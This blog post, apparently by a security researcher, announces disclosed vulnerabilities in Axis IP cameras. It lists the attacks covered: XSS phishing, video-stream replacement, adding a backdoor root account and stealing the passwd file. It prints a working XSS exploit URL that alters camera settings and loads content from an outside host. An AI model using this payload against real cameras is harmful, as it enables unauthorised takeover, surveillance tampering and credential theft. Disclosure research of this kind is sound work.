Owning Big Brother - Hollywood-style Exploits Included!
I've done some research on Axis IP cameras, which now I am able to disclose to you and reveal some of the magic. Although this is not independent research, I am mentioning it here as it may interest some.
The research is made of two components: a purple paper (one of the traditions we follow in GNUCITIZEN) and a video. I promise you that I won't bore you with PoCs, but actual Hollywood-style exploits. This includes the classic attack in which the legitimate video stream gets replaced by another stream that keeps looping forever (remember Speed. We even created a demo video of this attack! Blame Major Malfunction (soon to be featured) for this, as he suggested the third-party-video infinite loop technique.
Here are some of the juicy bits, mentioned in the paper:
- Cross-browser XSS phishing
- Replacing the legitimate video stream with our own
- Adding a Backdoor Root Account
- Stealing the 'passwd' File
Here is an example of an exploit that we've come up with. You don't know what it is doing? Well, read the paper for more details:
http://target/%3cscript%20src=%22/this_server/ServerManager.sr v%3fconf_Layout_TitleEnabled=yes&Layout_TitleEnabled=on&conf_L ayout_OwnTitleEnabled=yes&conf_Layout_OwnTitle=%3cimg%20src=ht tp://snipu.com/f1%3e%3c!-- &servermanager_do=set_variables%22%3e%3c/script%3e%3c!-- AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA